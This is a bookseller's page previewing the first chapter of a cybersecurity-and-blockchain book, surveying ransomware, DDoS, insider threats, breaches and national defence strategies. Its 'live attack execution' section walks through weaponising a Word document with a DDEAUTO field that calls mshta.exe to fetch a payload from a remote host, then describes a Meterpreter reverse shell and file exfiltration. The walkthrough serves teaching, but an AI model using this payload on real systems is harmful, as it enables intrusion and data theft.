Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Free Learning
Arrow right icon
Hands-On Cybersecurity with Blockchain
Hands-On Cybersecurity with Blockchain

Hands-On Cybersecurity with Blockchain: Implement DDoS protection, PKI-based identity, 2FA, and DNS security using Blockchain

Arrow left icon
Profile Icon Rajneesh Gupta
Arrow right icon
Free Trial
Full star icon Full star icon Full star icon Half star icon Empty star icon 3.8 (12 Ratings)
Paperback Jun 2018 236 pages 1st Edition
eBook
NZ$39.99 NZ$57.99
Paperback
NZ$71.99
Subscription
Free Trial
Arrow left icon
Profile Icon Rajneesh Gupta
Arrow right icon
Free Trial
Full star icon Full star icon Full star icon Half star icon Empty star icon 3.8 (12 Ratings)
Paperback Jun 2018 236 pages 1st Edition
eBook
NZ$39.99 NZ$57.99
Paperback
NZ$71.99
Subscription
Free Trial
eBook
NZ$39.99 NZ$57.99
Paperback
NZ$71.99
Subscription
Free Trial

What do you get with a Packt Subscription?

Free for first 7 days. $19.99 p/m after that. Cancel any time!
Product feature icon Unlimited ad-free access to the largest independent learning library in tech. Access this title and thousands more!
Product feature icon 50+ new titles added per month, including many first-to-market concepts and exclusive early access to books as they are being written.
Product feature icon Innovative learning tools, including AI book assistants, code context explainers, and text-to-speech.
Product feature icon Thousands of reference materials covering every tech concept you need to stay up to date.
Subscribe now
View plans & pricing
Table of content icon View table of contents Preview book icon Preview Book

Hands-On Cybersecurity with Blockchain

Cyber Threat Landscape and Security Challenges

The information has always been key to competitive advantage and sustainable success. Information is usually created when a series of high-volume and trusted data is used to answer a simple question. Intelligence is developed by collecting information to present a forecast that can be used for decision-making processes. Intelligence gathering is the most powerful and effective way to predict the future. From ancient intelligence to today's artificial intelligence, from the world wars to today's cyberwar, the goal is always to be a step ahead of our adversaries.

Let's look at the real world. The Chinese government and there military, the People's Liberation Army (PLA), have been accused of stealing technology and trade secrets, often from private institutes in the US. You may think that China wants to destroy the US, but that's not true. China simply wants to be the superpower and wants to be a technology leader. Eventually, it wants every single American, and even the rest of the world, to be technology-dependent on the Chinese market. This results in a continuous stream of Chinese spying operations targeting multinational businesses and government institutes to gather trade secrets. Let's switch gears now. Political parties gather information through advanced analytics from their own citizens to predict upcoming election results. It signifies that the world is having a profound impact on the internet.

The rapid transformation to cloud computing, IoT, cognitive computing, and mobility are now managing most critical assets of organizations; however, the increasing number of interconnected applications and technologies also result in an increase in the number of exploitable vulnerabilities. Organizations are deploying several security measures to locate and fix such security vulnerabilities; however, this is a never-ending job for security forces. Nevertheless, top vulnerabilities can be prioritized by sorting them out with the potential threat, but this needs a high degree of threat intelligence practice.

Cybersecurity is a 20-year-old phenomenon, but in the past five years, it has become more challenging for defenders to protect themselves against emerging threats, such as zero-day exploits, crypto-ransomware, terabytes of DDoS attacks, multi-vector malware, and advanced social engineering.

This book is prepared to adopt a paradigm shift in security perception. Despite adding another layer of security, this is an attempt to change the security mindset at a fundamental level. One of the most popular technologies named after the internet is the blockchain; however, what makes the blockchain truly revolutionary is its potential for applications beyond cryptocurrencies. Today, there are numerous startups that are using blockchain technology to disrupt existing business models and industry verticals such as cloud hosting, financial services, the supply chain, healthcare, cybersecurity, and many more. This book will be useful for security experts, security product engineers, and even blockchain enthusiasts. This book focuses on taking readers on a tour of the current security threat landscape and is a practical approach for overcoming some of the most critical security challenges with blockchain technology.

In this chapter, readers will learn about the following topics:

  • The current threat landscape
  • How defenders, including government bodies and businesses, are preparing themselves to defend their assets from adversaries
  • Live attack simulation to perform data exfiltration from a remote machine

Current threat landscape

In the new era of cyberspace, technology transformation has been a core factor for continuous security innovation and operations. In the world of connected vehicles, IoT, mobility, and the cloud, it opens up a focal point for cybercrime, targeted attacks, and industrial espionage. Once an attacker finds a vulnerability and determines how to access an application, they have everything they need to build an exploit for the application, and so it is critical to develop strong vulnerability management. Remember, the effectiveness of vulnerability management depends on the organization's ability to keep up with emerging security threats and models.

Security systems won't make an impact if employees are lured into clicking on a malicious link they were sent over email. Social engineering has proven to be an effective way to get inside a target network, and security forces face endless challenges in identifying malicious entry. Back in the old days, before Facebook and LinkedIn, if you needed to find information on organizations, you weren't going to get a lot information on the internet, and thus the use of social networking sites has made social engineering attacks easier to perform.

Ransomware

Ransomware is malware in which information on a victim's computer is encrypted and payment is demanded before granting them access. Ransomware is one of the most trending and high-return types of crimeware. It has attracted an enormous amount of media coverage in the past two years, mainly because of WannaCry, NotPetya, and Locky. WannaCry ransomware was spread rapidly across a number of systems worldwide in May 2017. It targeted several high-profile organizations including the UK's National Health Service, Spanish telephone giant Telefonica, French automobile leader Renault, US leading logistics company FedEx, Japanese firm Hitachi, and many more.  

The ransomware author hosts the service over the dark web, which allows any buyer to create and modify the malware.

The dark web is a part of the internet that can't be fetched with a search engine but needs a special type of anonymity browser called Tor. In other words, the dark web carries unindexed data that's not available to search engines. The Tor browser basically routes the user information through a series of proxy servers that makes user identity unidentifiable and untraceable. Dark websites look similar to ordinary websites, but there are some differences in the naming structure. Dark websites don't have a top-level domain (TLD) such as .com or .net or .co; rather, they just use websites that end with .onion.

The monetization of hacking 

As per the cybersecurity business report, ransomware damage costs are predicted to hit 11.5 billion by 2019. There are several driving factors behind the growing operation of ransomware globally. To earn faster, cybercriminals have stopped making malware themselves and started leveraging Ransomware-as-a-service (RaaS), which is available over the dark web marketplace. 

These marketplaces don't just reduce the effort for expert criminals, but they also allow non-technical criminals or script kiddies to conduct ransomware operations.

The attacker produces a ransomware program with a preconfigured timer that ensures the destruction of data if a ransom is not paid before the specified time. Attackers also share a payment procedure, which is mostly through a Bitcoin wallet (since a digital cryptocurrency wallet provides anonymity).

WannaCry

WannaCry attacks were the biggest ransomware attacks and occurred in May 2017. WannaCry made use of a vulnerability in the Windows OS, first identified by the NSA, and then made publicly available through Shadow Brokers. It was designed to exploit a vulnerability in Windows SMBv1 and SMBv2, so that one moves laterally within networks. By May 24, 2017, more than 200,000 computer systems were infected in 150 countries.

NotPetya

NotPetya is another flavor of ransomware attack, which was launched in June 2017. The NotPetya ransomware apparently resembles the Petya virus in several ways: it encrypts the file and shows a screen requesting Bitcoin to restore the files. The original infection method was backdoor planted in M.E.Doc (a leading Ukrainian accounting company's software). After compromising the system through the M.E.Doc software, NotPetya used tools such as EternalBlue and EternalRomance to spread across network. It also took advantage of a tool called Mimi Katz to find administration credentials in the compromised machine.

SimpleLocker

SimpleLocker was the first ransomware attack that did not affect any computer systems, but affected several mobile phones. The choice of OS that the hackers preferred was Android, and the origin of this ransomware was tracked to Eastern Europe. The Trojan was targeting SD cards slotted into tablets and handsets, automatically crawling the entire set to get certain files and then demanding cash to decrypt the data. The virus entered the devices through Google Play Store. Once installed, the virus would scan the affected device for various file types and encrypted those using an Advanced Encryption Standard (AES), changing the file extensions to .enc. It also used to collect various other information from the respective device, such as the IMEI number, device model, and manufacturer, and sent this to a C2 server. With the latest versions of this virus, hackers can even access the device camera and display a picture of the victims to scare them into paying the ransom. This threat is still lurking out there.

TeslaCrypt

Within a year of CryptoLocker, a new threat came into existence, TeslaCrypt. At the start, many believed it to be one of the dimensions of CryptoLocker, but later it was given a new name, TeslaCrypt. This ransomware targeted a different set of people: hardcore gamersTeslaCrypt targeted and affected the ancillary files that are associated with video games. This contained saved game files, maps, any game-related downloadable content, and so on. The uniqueness of this ransomware was that the creators of this ransomware constantly improved the impact of the Trojan and filled the loopholes that were there while the attack was ongoing.

CryptoLocker

CryptoLocker is grand-scale ransomware, and is believed to have been first posted on the internet on September 5, 2013, cultivated through an email attachment and over the Gameover Zeus botnet. It exerted influence on systems running on Microsoft Windows, and was spread through malicious email attachments and used to encrypt certain types of files stored on the local and network drives of a user, using RSA encryption. CryptoLocker was removed in late May 2014 through the Tovar operation, which took down the Gameover Zeus botnet. It was reported that CryptoLocker successfully extorted more than $3 million from victims.

PC Cyborg

In 1989, a Trojan named PC Cyborg was discovered, which had the capability of hiding folders and then encrypting the name of the files in the C drive. The victim then had to pay $189 to the PC Cyborg corporation, which was registered at a Panama post office.

Distributed denial-of-service (DDoS) attacks

A DDoS attack is a malicious attempt to disrupt the legitimate user traffic of a server by overwhelming it with a flood of random traffic. DDoS differs from DoS by its distributed nature, attacking a target from several independent networks of compromised systems. These compromised computer systems are called bots, and a botnet refers to a group of such bots under the control of the same malicious actor.  

DDoS attacks have become a frequent hazard, as they are commonly used to take revenge, conduct extortion, activism, and even for cyberwar. In October 2016, leading ISP Dyn's DNS was bombarded by a wave of DNS queries from millions of bots. The attack was executed by the Mirai botnet, and was composed of over 100,000 IoT devices. 

From script kiddies to geopolitical

There are numerous theories about the attack launched on October 26, 2016 on Dyn's DNS infrastructure. One of the most sensitive and highest impact DDoS attacks was noted to be against Dyn, a US-based DNS service provider, that caused several major websites including Twitter, Reddit, GitHub, Amazon, Netflix, PayPal, and many more to be inaccessible by a major part of country. There are numerous theories and claims as to who could be behind this. Security researchers pointed the finger of blame at script kiddies; however, there was also a claim by a hacker group, Jester, that the Russian government was behind the attacks. The hacker group Jester defaced the Russian foreign ministry against a Democratic National Committee (DNC) hack.

This didn't just stop there; there have been some high-profile damages as of late as well. The political crisis in Qatar led to a DDoS attack on Al Jazeera's website. France's presidential election was disrupted by attacks on the Le Figaro and Le Monde websites.

Ease of launching a DDoS attack

You could launch DDoS attacks by paying $10 an hour, $200, or $600-$1200 for an entire week. Several attackers on the dark web are offering DDoS for hire services that make launching DDoS attacks easy.

Someone who is looking to bombard their targets with a burst of heavy traffic gets charged for every second of botnet use rather than an hourly fee.

Top targeted countries

Attackers can compromise a computer and make their own bot. These bots are used to conduct reconnaissance, web page crawl, and even DDoS attacks. It is important to understand that countries that have a larger number of compromised systems should be aware of their global risk index. The following is a diagram of the global DDoS threat landscape in Q2 2017 by a leading DDoS protection provider called Incapsula:

33% of businesses around the world had been affected by DDoS attacks in 2017 alone. The number doubled when compared to 2016, wherein double the number of businesses were affected by DDoS attacks.

Insider threats

Any form of threat can originate from inside an organization, and it's not just limited to an employee with malicious intent; it can even be contractors, former employees, board members, stockholders, or third-party entities.

Some more ways to define insider threats

CERT's Common Sense Guide to Mitigating Insider Threats defines an insider as a current or former employee, contractor, or business partner who meets the following criteria:

  • Has or had authorized access to an organization's network, system, or data
  • Has intentionally exceeded or intentionally used that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization's information or information systems

Insider threat profile

Before this can be described, its is important to understand the need for it, and this need was indicated by the US Department of Defense (DoD) in 2000, which is also when research by the CERT division was initiated. For an insight into the insider threat profile and its corresponding behavior, check out the link at https://ccdcoe.org/sites/default/files/multimedia/pdf/Insider_Threat_Study_CCDCOE.pdf.

A malicious threat that comes from within an organization, such as from employees, former employees, partners, associates, and so on, does need not come from outside to affect the systems of the organization. This attack is more menacing than that of other malware as this comes from people who have access to the main systems, and they have knowledge that allows them to bypass security in a legitimate manner. Insider threats exist everywhere. If someone says that they are not prone to an insider threat, then they may not actually know what one is and how fatal it can be for an organization. A so-called insider may try to access confidential files for personal gain. This gain can be anything from selling information to competitors to stealing it for the insider's own personal use.
The attrition rate in any organization is at a considerable level. People leave and join companies every year or two. This serves as a motivation for employees to keep certain information to themselves, as employees think that they have the right to hold on to such information just because of the fact that they had been working on that piece of information for a considerable amount of time. Talking about insider threats, not even the US government is free from insider threats. A report published in 2012 stated that most insider threats actually take place during an employee's working hours. Since technology has made it easier to identify where the breach or the attack started, there is no evidence, and the number of culprits were not identified in all the cases.

Data breaches

In 2017, a study by the Ponemon Institute called the Cost of Cyber Crime Study showed that the average cost of a data breach is currently $3.62 million globally, which is actually a 10% decline from 2016.

Data breaches may involve the leaking of sensitive corporate documents, technical blueprints, intellectual property, trade secrets, or even emails. This has always been massive in number and has an even bigger impact on businesses. Sophisticated attackers are capable of weaponizing malware highly tailored for the target and they are also managing to deliver the malware silently. 

As per Mandiant's M-Trend 2017 report, most victim organizations were notified about the breach by people other than their own staff. More than 53% of breaches were discovered by an external source. Organizations should have a proactive breach management plan to detect the breach before getting notified by an outsider. The earlier it is detected, the more money organizations can save. The Ponemon Institute also suggested that organizations should aim to identify a breach within 100 days. The average cost of detecting a breach within this time is $5.99 million, but for those who don't have the tools to detect this, the average cost rose to $8.70 million. There are several ways data breaches happen, and the following are some of the most common reasons:

  • Malicious attacks: Adversaries can launch a malware or malware-less attack, leveraging application vulnerabilities to exfiltrate sensitive information.
  • Weak security systems: Attackers have became more advanced and persistent in nature. Attackers can use stolen credentials to look like legitimate users in the network and hence bypass existing security systems such as firewalls, intrusion prevention system (IPS), and endpoint security. 
  • Human error: As per a Verizon Data Breach investigation report in 2017, 88% of data breaches involve human error. Human error is something that all organizations have to deal with. 

Notable recent data breaches

Some of the most notable recent data breaches are as follows:

  • Equifax in September 2017: Equifax, one of the three largest credit agencies in the US, suffered a breach that affected 143 million consumers. An unknown threat group were successful in compromising Equifax online services by exploiting the vulnerability of Apache Struts CVE-2017-5638. Due to the sensitivity of the stolen data, including Social Security Number (SSN) and driving license numbers, this was one of the worst breaches of all time.
  • Verizon in July 2017: Around 14 million of Verizon's subscribers may have been affected by the data breach. The compromised server was managed by the Israel-based NICE system.
  • Edmodo in May 31, 2017: More than 78 million users had their information stolen from the education platform Edmodo. This was publicly notified when a hacker, known as nclay, was found selling 77 million Edmodo accounts on the dark web for $1,000.
  • Verifone in March 7, 2017: Verifone, the leading maker of point of sale (POS) credit card terminals used in the US, discovered a massive data breach of its internal network. Sources indicate that there is evidence that a Russian hacking group was involved in the breach.

Impact of data breaches

The consequences for businesses that experience data loss of their customers or partner's information, or any other confidential data, are severe and growing. Ponemon Institute, an independent security research company, has conducted a survey of data breach victim organizations to find out the impact of data breaches:

  • Financial loss: Around 113 listed companies that experienced a data breach had their stock price drop an average of 5%, which resulted in a loss of their customer base
  • Brand reputation loss: 61% of CMOs believe that the biggest cost of a data breach is the loss of a brand's value
  • Customer trust loss: Consumers trust financial institutes, healthcare providers, and even government departments, to preserve their personal information and privacy

To get an insight into each impact, take a look at the following Ponemon Institute report from 2017: https://www.centrify.com/media/4772757/ponemon_data_breach_impact_study_uk.pdf.

Advanced persistence threat (APT)

An APT uses multiple phases to break into a network, avoid detection, and harvest valuable information over the long term:

  • Advanced: It is an advanced attack because it is made up of a broad spectrum of infection vectors and malware technologies that are available to the attacker, which are blended together to result in the successful compromise of a system.
  • Persistent: It is persistent because the threat of being compromised is always there.
  • Threat: This is not a typical, run-of-the-mill system compromise. This attack poses a real threat to the target, not only because it is backed by highly organized, well-funded, and motivated criminal elements, but also because if the attack is successful, it can have dire consequences for the target way beyond a normal system cleanup.

With technological advancements, new ways have risen to stalk corporate entities and any business. This is done in the form of APT. APT can be described as an attack on the network of an organization, which allows unauthorized people to be in the network for a long period of time without being detected.

What makes APTs so different?

APTs are different than regular cybercriminals based on the selection of a target, the goal, and human factors:

  • Targets: They are chosen based on financial, political, geopolitical, surveillance, and security intelligence interests to gain high-value information
  • Goal: The goal of an APT is not to simply get in and get out, but to gain prolonged access to the network's resources and keep themselves undetected by security administrators
  • Human factors: This is a critical element for the entire APT operation, since the operation can occur through spear phishing or even insider threats

For more information on data exfiltration, follow the link at http://about-threats.trendmicro.com/cloud-content/us/ent-primers/pdf/how_do_threat_actors_steal_your_data.pdf.

Defender perspectives

After understanding the emerging threat landscape and some of the most effective cyberattacks, it is important to work on our own defense. These threat groups have got everything they need to discover an organization's assets and then find the vulnerabilities to build their weapons accordingly. This leads to a huge concern for organizations that have been non-adaptive, sometimes for more than decades, but let's accept the fact that there are a good number of bodies who have been brilliant in achieving cyber hygiene and better cyber defense ecosystems. Let's focus on some of these bodies, including governments and businesses. 

Governments

Government electronic systems have been targeted by foreign security agencies to gather intelligence. With the growing use of interconnected technology, government systems are also facing challenges in increasing attack surfaces. It is important that government authorities become better at protecting their critical assets. 

The United States (US)

US President Donald Trump signed an executive order on May 11, 2017 that covers strengthening the cybersecurity of the federal network, emphasizing accountability, an adaptation of the framework to improve its critical infrastructure, and modernizing existing cybersecurity systems. The DoD has also presented its own strategy on strengthening cyber defense and cyber deterrence postures, and this includes three primary cyber missions, as shown in the following screenshot:

Cyber mission force plan to form 133 teams by 2018

To understand more about the DoD's strategy on strengthening its cyber defense and cyber deterrence posture, follow the link at https://www.defense.gov/News/Special-Reports/0415_Cyber-Strategy/.

The United Kingdom (UK)

With the National Cyber Security Strategy (NCSS) 2016-2021, the United Kingdom's government has planned to make its country secure and resilient. This vision is summarized in the following three objectives:

  • To defend cyberspace: This is used to ensure that UK networks, data, and systems are protected and resilient. From this, UK citizens, corporations, and public institutions should have enough expertise and the ability to defend themselves.
  • To deter adversaries: This is used to detect, understand, investigate, and disrupt cyber threats against the UK.
  • To develop its capabilities: With its self-sustaining pool of talent, it provides the necessary skills to help UK nationals across public and private sectors.

To get an insight into the UK NCSS program, follow the link at https://www.gov.uk/government/publications/national-cyber-security-strategy-2016-to-2021.

Europe

The European Union Agency for Network and Information Security (ENISA) serves as a center of expertise and excellence for both member states and EU institutions related to network and information security. There are some major notable initiatives, such as the Annual Privacy Forum (APF), ENISA Threat Landscape (ETL), and Cyber Europe—a pan-European exercise to protect the EU against coordinated cyberattacks.

In 2018, General Data Protection Regulation (GDPR) will replace the Data Protection Directive 95/46/EC with the following changes under its increased territorial scope: penalties, consent, breach notification, right to access, right to be forgotten, data portability, privacy by design, and data protection officers. To get an insight into each vertical of GDPR, visit the link at https://www.eugdpr.org/key-changes.html.

India

In February 2017, the Indian government's Computer Emergency Response Team (CERT-In) launched Cyber Swachhta Kendra, a Botnet Cleaning and Malware Analysis Center to create a secure Indian cyberspace through detecting and cleaning bots in user endpoints. To know more about India's initiative on the bot cleaning program and how other bodies are helping the government to achieve this goal, visit the link at http://www.cyberswachhtakendra.gov.in/.

Corporate

With the rapid adaptation of mobility, cloud, and IoT, businesses are getting ever more exposed to potential threats. In fact, some of the most trending technologies such as Bring Your Own Device (BYOD) make the probability and severity of insider threats even higher. Even after spending millions of dollars on preventative security, it still never gives complete assurance, and this has made organizations explore various emerging security defense technologies to detect and combat advanced threats that are successful in bypassing existing security systems. In many multinational organizations, the Chief Information Security Officer (CISO) has got multiple hats to wear at a time. In 2018, every CISO will be making some critical decisions regarding their organization's security.

Some of the emerging security defenses are mentioned here.

Endpoint detection and response (EDR)

EDR is a solution designed to detect and remove malicious activities from a network. EDR solutions will typically include the following four capabilities:

  • Detecting threats with the continuous monitoring of endpoints
  • Collecting and investigating logs and comparing and correlating them with historical events from each endpoint's activity
  • Responding to the dangerous attempts of resources and removing them from the network
  • Killing unauthorized processes to put the endpoint in a normal state

Deception technology

Deception has been used by the ancient military to in the world wars, and now this time in the world of cyberspace. In a nutshell, this is a technology that allows attackers to penetrate a decoy target system. With deception, enterprises can detect attackers and gather insights into their behavior and artifacts, which will then help improve their defense. This can be extended with multilevel stacks, including network devices, endpoints, and applications. 

Cyber threat intelligence (CTI)

CTI is a way of analyzing the capability of adversaries. In cyberspace, it is often delivered in the form of an indicator of compromise (IOC), which includes malicious IP addresses, domain names, hashes, and so on. It is critical for organizations to understand their assets, people, and each connected third party so that they can prepare their own threat intelligence and plan to strengthen their defense.

Live attack execution

In recent attacks, adversaries have run arbitrary code that is executed from a Microsoft Word document without the use of any macros or scripts. This technique is a legitimate Microsoft Office functionality called Dynamic Data Exchange (DDE).

Let's try to see this attack from a cyber kill chain perceptive. The Cyber kill chain is used to describe the attack stages:

  • Reconnaissance: This is a planning phase where the attacker gathers information about something through observation or other detection methods. Cyberattack planning and reconnaissance often include conducting research about the target, usually with open source information gathering tools, such as Google and Shodan, as well as through searches of publicly available data, such as public announcements and social media, company profiles for email, and email harvesting.
  • Weaponization: In this stage, a threat actor plans for the right attack method. The threat actor can even plan to exploit an employee by phishing their email or even with a drive-by download attack. In our example, first we will create a malicious document. In the blank document, go to the Insert | Quick Parts | Field... tab, as shown in the following screenshot:

In the Field names dialog box, select the =(Formula) option to insert our DDE exploit code:

After this, you will see a field in the document with an error: !Unexpected End of Formula. Right-click on that field, and choose the Toggle Field Codes option. You need to do this to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened:

In the text field, enter the following code:

DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK

Then, save the document with any name of your choice, such as Financial_Statement:

  • Delivery: Endpoints are the primary means of delivery, whether through a drive-by download from a website, a targeted phishing attack, or an infection through an employee-owned device through a secure virtual private network (VPN).
  • Exploitation and installation: At this stage, the attacker will take advantage of software or human weakness to get the payload to run. In DDE exploitation, adversaries send an email that contains the malicious document. When the user runs that document, the adversaries will get the reverse shell of the victim's machine.

Let's see how the adversaries made the exploits during the weaponization stage and how they gained access to the victim's machine. The adversaries created the malicious payload document and sent it to the victim through an email. Take a look at the following screenshot:

When the user opened the document sent by the adversaries, the payload was executed after one error message, as shown in the following screenshot:

If the user chooses to start the malicious document, the payload will be executed and a Meterpreter session will open:

Action on objectives: This is how the threat actor is successful and gains access to the organization's sensitive files. The adversary tries to exfiltrate the data from the victim's machine. There are many confidential files here that the adversaries try to exfiltrate:

The adversaries take a screenshot of what the victim is doing and try to find out what process is running on the machine, as shown in the following screenshot:

Emerging security challenges

Every organization has to be a part of this never-ending race against cyber attackers. If you fail to keep yourself ahead of your adversaries, you are likely become the victim of attacks. In the coming years, defenders have to prepare themselves for some of the emerging security challenges and threats. These are as follows:

  • Slow security adaptation: Unlike networking and cloud transformation, cyber security solutions are not evolving at the expected rate. The traditional network segmentation has been replaced with a simplified and flat architecture, removing lots of network complexity. However, security solutions still use the traditional zone-based approach to mitigate threats.
  • Human error: As per the IBM Security service report, more than 95% of investigated cyber incidents occurred due to human errors, such as system misconfiguration and insufficient patch management.
  • Third-party vendor security risk: In the world of interconnected businesses, organizations have to let other organizations store and use their information for better business operations, but this can also lead to a bigger risk. If a third party gets compromised, the organization is at risk of losing business data. Most supply chain attacks use sophisticated attack vectors that manage to bypass existing security systems.

Summary

After understanding the current threat landscape, defender's perspective, a live attack simulation, and the root cause of security failure, it seems very clear that there is no silver bullet for data breaches and other advanced targeted attacks. Adversaries are changing their weapons and tactics in regard to the changes in technology and business processes, and with this, defenders are aggressively exploring various security tools. It is also clear that attackers do not need to be sophisticated to perform a sophisticated data breach; they simply have to be opportunists. With the open source tools and free online reconnaissance platforms available, threat actors are able to discover assets and their corresponding vulnerabilities.

In the next chapter, you will learn about some effective ways to deploy cyber security systems.

Questions

The world of cyberspace always leaves room for questions about the real risks to businesses and organizations, achieving better defensive strategies, and situations where security can go wrong. Some of the most widely asked questions are as follows:

  1. How do you keep an organization updated with an adversary's capabilities in cyberspace?
  2. How do you prepare effective cyber threat intelligence?
  3. How do we adapt to the emerging cyber security technologies?

Further reading

Left arrow icon Right arrow icon

Key benefits

  • • Understanding the blockchain technology from the cybersecurity perspective
  • • Developing cyber security solutions with Ethereum blockchain technology
  • • Understanding real-world deployment of blockchain based applications

Description

Blockchain technology is being welcomed as one of the most revolutionary and impactful innovations of today. Blockchain technology was first identified in the world’s most popular digital currency, Bitcoin, but has now changed the outlook of several organizations and empowered them to use it even for storage and transfer of value. This book will start by introducing you to the common cyberthreat landscape and common attacks such as malware, phishing, insider threats, and DDoS. The next set of chapters will help you to understand the workings of Blockchain technology, Ethereum and Hyperledger architecture and how they fit into the cybersecurity ecosystem. These chapters will also help you to write your first distributed application on Ethereum Blockchain and the Hyperledger Fabric framework. Later, you will learn about the security triad and its adaptation with Blockchain. The last set of chapters will take you through the core concepts of cybersecurity, such as DDoS protection, PKI-based identity, 2FA, and DNS security. You will learn how Blockchain plays a crucial role in transforming cybersecurity solutions. Toward the end of the book, you will also encounter some real-world deployment examples of Blockchain in security cases, and also understand the short-term challenges and future of cybersecurity with Blockchain.

Who is this book for?

The book is targeted towards security professionals, or any stakeholder dealing with cybersecurity who wants to understand the next-level of securing infrastructure using Blockchain. Basic understanding of Blockchain can be an added advantage.

What you will learn

  • • Understand the cyberthreat landscape
  • • Learn about Ethereum and Hyperledger Blockchain
  • • Program Blockchain solutions
  • • Build Blockchain-based apps for 2FA, and DDoS protection
  • • Develop Blockchain-based PKI solutions and apps for storing DNS entries
  • • Challenges and the future of cybersecurity and Blockchain

Product Details

Country selected
Publication date, Length, Edition, Language, ISBN-13
Publication date : Jun 28, 2018
Length: 236 pages
Edition : 1st
Language : English
ISBN-13 : 9781788990189
Category :
Concepts :
Tools :

What do you get with a Packt Subscription?

Free for first 7 days. $19.99 p/m after that. Cancel any time!
Product feature icon Unlimited ad-free access to the largest independent learning library in tech. Access this title and thousands more!
Product feature icon 50+ new titles added per month, including many first-to-market concepts and exclusive early access to books as they are being written.
Product feature icon Innovative learning tools, including AI book assistants, code context explainers, and text-to-speech.
Product feature icon Thousands of reference materials covering every tech concept you need to stay up to date.
Subscribe now
View plans & pricing

Product Details

Publication date : Jun 28, 2018
Length: 236 pages
Edition : 1st
Language : English
ISBN-13 : 9781788990189
Category :
Concepts :
Tools :

Packt Subscriptions

See our plans and pricing
Modal Close icon
$19.99 billed monthly
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Simple pricing, no contract
$199.99 billed annually
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Choose a DRM-free eBook or Video every month to keep
Feature tick icon PLUS own as many other DRM-free eBooks or Videos as you like for just NZ$7 each
Feature tick icon Exclusive print discounts
$279.99 billed in 18 months
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Choose a DRM-free eBook or Video every month to keep
Feature tick icon PLUS own as many other DRM-free eBooks or Videos as you like for just NZ$7 each
Feature tick icon Exclusive print discounts

Frequently bought together


Stars icon
Total NZ$ 226.97
Hands-On Cybersecurity with Blockchain
NZ$71.99
Hands-On Blockchain with Hyperledger
NZ$80.99
Cybersecurity - Attack and Defense Strategies
NZ$73.99
Total NZ$ 226.97 Stars icon
Banner background image

Table of Contents

12 Chapters
Cyber Threat Landscape and Security Challenges Chevron down icon Chevron up icon
Security Must Evolve Chevron down icon Chevron up icon
Introducing Blockchain and Ethereum Chevron down icon Chevron up icon
Hyperledger – Blockchain for Businesses Chevron down icon Chevron up icon
Blockchain on the CIA Security Triad Chevron down icon Chevron up icon
Deploying PKI-Based Identity with Blockchain Chevron down icon Chevron up icon
Two-Factor Authentication with Blockchain Chevron down icon Chevron up icon
Blockchain-Based DNS Security Platform Chevron down icon Chevron up icon
Deploying Blockchain-Based DDoS Protection Chevron down icon Chevron up icon
Facts about Blockchain and Cyber Security Chevron down icon Chevron up icon
Assessment Chevron down icon Chevron up icon
Other Books You May Enjoy Chevron down icon Chevron up icon

Customer reviews

Top Reviews
Rating distribution
Full star icon Full star icon Full star icon Half star icon Empty star icon 3.8
(12 Ratings)
5 star 50%
4 star 16.7%
3 star 8.3%
2 star 16.7%
1 star 8.3%
Filter icon Filter
Top Reviews

Filter reviews by




Jashan Oct 04, 2018
Full star icon Full star icon Full star icon Full star icon Full star icon 5
A great book - full of knowledge and thinking. Blockchain is NOVEL....so only education it made me understand what it really is. This book is a great starting point and can be read and understood by anyone.
Amazon Verified review Amazon
Satya N. Oct 06, 2018
Full star icon Full star icon Full star icon Full star icon Full star icon 5
Wearing my security manager’s hat (well, I would, but I haven’t occupied that particular vocational niche for many years, so I don’t have one), I know Security on the Information Superhighway ’ a useful resource (especially as a source of useful citation, if less groundbreaking. Also with this book Mr.Rajneesh has done full justice by explaining blockchain with cybersecurity, being security expert I could very much relate with the said topic for me this book interested me to learn more about blockchain and cybersecurity. Kudos !!
Amazon Verified review Amazon
Shweta chaturvedi Sep 21, 2018
Full star icon Full star icon Full star icon Full star icon Full star icon 5
As a complete Blockchain novice, I found this book very informative and easy to understand. I would like to understand Blockchain more however, this book has been a good starting point for me I would like to read more about the topic.
Amazon Verified review Amazon
Ankita Sharma Aug 06, 2018
Full star icon Full star icon Full star icon Full star icon Full star icon 5
A big thumbs up! this book acts as a welcome invitation for technologists. As such, it provides information about the business and potential of the blockchain. In the same way, this title will help the business minded individual to grasp the different facets of blockchain technology, while the author has perfectly taken through the process by, by empowering all...to think about cybersecurity with blockchain.He has done justice by explaining how Cybersecurity with blockchain looks to become the playbook for the business leader. Intended to inform players in the corporate world for the next decade (and beyond), present an utterly foundational, comprehensive, and perfectly researched book about the Said topic Blockchain, as well as its future. Reading this book, therefore, will inform you about the various impacts the technology behind Bitcoin is having on the business world, and on financial matters.e technology is likely to have a great impact on the system both present and future.
Amazon Verified review Amazon
Zulfa Khan Aug 07, 2018
Full star icon Full star icon Full star icon Full star icon Full star icon 5
Amazing book amazingly written...clamped with lots and lots of knowledge on cybersecurity and blockchain..A must try book for all those into cybersecurity also for those who are into IT industry...this book opened a lot of horizons of understanding for me with respect to cybersecurity with blockchain...a sure sure thumbs up👍👍👍👍
Amazon Verified review Amazon
Get free access to Packt library with over 7500+ books and video courses for 7 days!
Start Free Trial

FAQs

What is included in a Packt subscription? Chevron down icon Chevron up icon

